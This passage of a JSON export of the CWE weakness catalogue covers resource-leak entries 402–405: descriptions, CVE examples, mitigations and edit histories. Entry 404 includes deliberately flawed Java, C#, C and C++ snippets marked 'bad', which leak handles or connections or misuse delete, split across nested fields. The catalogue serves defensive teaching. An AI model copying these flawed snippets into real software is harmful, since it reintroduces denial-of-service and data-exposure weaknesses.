Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Name, References, Relationships, Taxonomy_Mappings, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Memory Leak","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Release Memory Before Removing Last Reference (aka \'Memory Leak\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Release Memory Before Removing Last Reference (\'Memory Leak\')","attr":{"@_Date":"2010-12-13"}},{"#text":"Improper Release of Memory Before Removing Last Reference (\'Memory Leak\')","attr":{"@_Date":"2019-01-03"}},{"#text":"Improper Release of Memory Before Removing Last Reference","attr":{"@_Date":"2019-06-20"}}]}},"402":{"attr":{"@_ID":"402","@_Name":"Transmission of Private Resources into a New Sphere (\'Resource Leak\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software makes resources available to untrusted parties when those resources are only intended to be accessed by the software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Resource Leak"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Resource leaks"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Resource Leaks","attr":{"@_Date":"2008-04-11"}},{"#text":"Transmission of Private Resources into a New Sphere (aka \'Resource Leak\')","attr":{"@_Date":"2009-05-27"}}]}},"403":{"attr":{"@_ID":"403","@_Name":"Exposure of File Descriptor to Unintended Control Sphere (\'File Descriptor Leak\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors.","Extended_Description":"When a new process is forked or executed, the child process inherits any open file descriptors. When the child process has fewer privileges than the parent process, this might introduce a vulnerability if the child process can access the file descriptor but does not have the privileges to access the associated file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"402","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"File descriptor leak","Description":"While this issue is frequently called a file descriptor leak, the \\"leak\\" term is often used in two different ways - exposure of a resource, or consumption of a resource. Use of this term could cause confusion."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0740","Description":"Server leaks a privileged file descriptor, allowing the server to be hijacked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0740"},{"Reference":"CVE-2004-1033","Description":"File descriptor leak allows read of restricted files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1033"},{"Reference":"CVE-2000-0094","Description":"Access to restricted resource using modified file descriptor for stderr.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0094"},{"Reference":"CVE-2002-0638","Description":"Open file descriptor used as alternate channel in complex race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0638"},{"Reference":"CVE-2003-0489","Description":"Program does not fully drop privileges after creating a file descriptor, which allows access to the descriptor via a separate vulnerability.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0489"},{"Reference":"CVE-2003-0937","Description":"User bypasses restrictions by obtaining a file descriptor then calling setuid program, which does not close the descriptor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0937"},{"Reference":"CVE-2004-2215","Description":"Terminal manager does not properly close file descriptors, allowing attackers to access terminals of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2215"},{"Reference":"CVE-2006-5397","Description":"Module opens a file for reading twice, allowing attackers to read files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5397"}]},"Affected_Resources":{"Affected_Resource":["System Process","File or Directory"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNIX file descriptor leak"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Ensure files are properly closed when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-392"}},{"attr":{"@_External_Reference_ID":"REF-393","@_Section":"Elevating Privileges Safely"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Affected_Resources, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Description, Name, Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"UNIX File Descriptor Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Exposure of File Descriptor to Unintended Control Sphere","attr":{"@_Date":"2013-02-21"}}]}},"404":{"attr":{"@_ID":"404","@_Name":"Improper Resource Shutdown or Release","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program does not release or incorrectly releases a resource before it is made available for re-use.","Extended_Description":"When a resource is created or allocated, the developer is responsible for properly releasing the resource as well as accounting for all potential paths of expiration or invalidation, such as a set period of time or revocation.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"405","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"619","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"Improper release or shutdown of resources can be primary to resource exhaustion, performance, and information confidentiality problems to name a few."},{"Ordinality":"Resultant","Description":"Improper release or shutdown of resources can be resultant from improper error handling or insufficient resource tracking."}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Availability","Other"],"Impact":["DoS: Resource Consumption (Other)","Varies by Context"],"Note":"Most unreleased resource issues result in general software reliability problems, but if an attacker can intentionally trigger a resource leak, the attacker might be able to launch a denial of service attack by depleting the resource pool."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"When a resource containing sensitive information is not correctly shutdown, it may expose the sensitive data in a subsequent allocation."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Resource clean up errors might be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."]},"Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated."]}},{"Phase":"Implementation","Description":"It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free memory in a function. If you allocate memory that you intend to free upon completion of the function, you must be sure to free the memory at all exit points for that function including error conditions."},{"Phase":"Implementation","Description":"Memory should be allocated/freed using matching functions such as malloc/free, new/delete, and new[]/delete[]."},{"Phase":"Implementation","Description":"When releasing a complex object or structure, ensure that you properly dispose of all of its member components, not just the object itself."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-81"},"Intro_Text":"The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}fil.Close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}}],"Body_Text":"The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure."},{"attr":{"@_Demonstrative_Example_ID":"DX-82"},"Intro_Text":"This code attempts to open a connection to a database and catches any exceptions that may occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch ( Exception e ) {}","xhtml:div":[{"#text":"Connection con = DriverManager.getConnection(some_connection_string);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log( e );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}},"Body_Text":"If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application."},{"attr":{"@_Demonstrative_Example_ID":"DX-83"},"Intro_Text":"Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();...","xhtml:br":["","","","","","","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-84"},"Intro_Text":"The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int decodeFile(char* fName) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char buf[BUF_SZ];FILE* f = fopen(fName, \\"r\\");if (!f) {}else {}fclose(f);return DECODE_SUCCESS;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"printf(\\"cannot open %s\\\\n\\", fName);return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (fgets(buf, BUF_SZ, f)) {}","xhtml:div":{"#text":"if (!checkChecksum(buf)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"}},{"#text":"decodeBlock(buf);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}]}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-85"},"Intro_Text":"In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A {};void A::foo(){}","xhtml:div":[{"#text":"void foo();","attr":{"@_style":"margin-left:10px;"}},{"#text":"int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-86"},"Intro_Text":"In this example, the program calls the delete[] function on non-heap memory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A{};void A::foo(bool heap) {}","xhtml:div":[{"#text":"void foo(bool);","attr":{"@_style":"margin-left:10px;"}},{"#text":"int localArray[2] = {};int *p = localArray;if (heap){}delete[] p;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"11,22","attr":{"@_style":"margin-left:10px;"}},{"#text":"p = new int[2];","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""]}],"xhtml:br":""}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1127","Description":"Does not shut down named pipe connections if malformed data is sent.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1127"},{"Reference":"CVE-2001-0830","Description":"Sockets not properly closed when attacker repeatedly connects and disconnects from server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830"},{"Reference":"CVE-2002-1372","Description":"Return values of file/socket operations not checked, allowing resultant consumption of file descriptors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1372"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improper resource shutdown or release"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unreleased Resource"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Release resources when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP14","Entry_Name":"Failure to release resource"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"125"}},{"attr":{"@_CAPEC_ID":"130"}},{"attr":{"@_CAPEC_ID":"131"}},{"attr":{"@_CAPEC_ID":"494"}},{"attr":{"@_CAPEC_ID":"495"}},{"attr":{"@_CAPEC_ID":"496"}},{"attr":{"@_CAPEC_ID":"666"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 8: C++ Catastrophes." Page 143"}}},"Notes":{"Note":{"#text":"Overlaps memory leaks, asymmetric resource consumption, malformed input errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"405":{"attr":{"@_ID":"405","@_Name":"Asymmetric Resource Consumption (Amplification)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Software that does not appropriately monitor or control resource consumption can lead to adverse system performance.","Extended_Description":"This situation is amplified if the software allows malicious users or attackers to consume more resources than their access level permits. Exploiting such a weakness can lead to asymmetric resource consumption, aiding in amplification attacks against the system or the network.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Resource Consumption (Other)"],"Note":"Sometimes this is a factor in \\"flood\\" attacks, but other types of amplification exist."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"An application must make resources available to a client commensurate with the client\'s access level."},{"Phase":"Architecture and Design","Description":"An application must, at all times, keep track of allocated resources and meter their usage appropriately."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Asymmetric resource consumption (amplification)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":41,"Entry_Name":"XML Attribute Blowup"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"TPS00-J","Entry_Name":"Use thread pools to enable graceful degradation of service during traffic bursts"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Release resources when they are no longer needed"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content 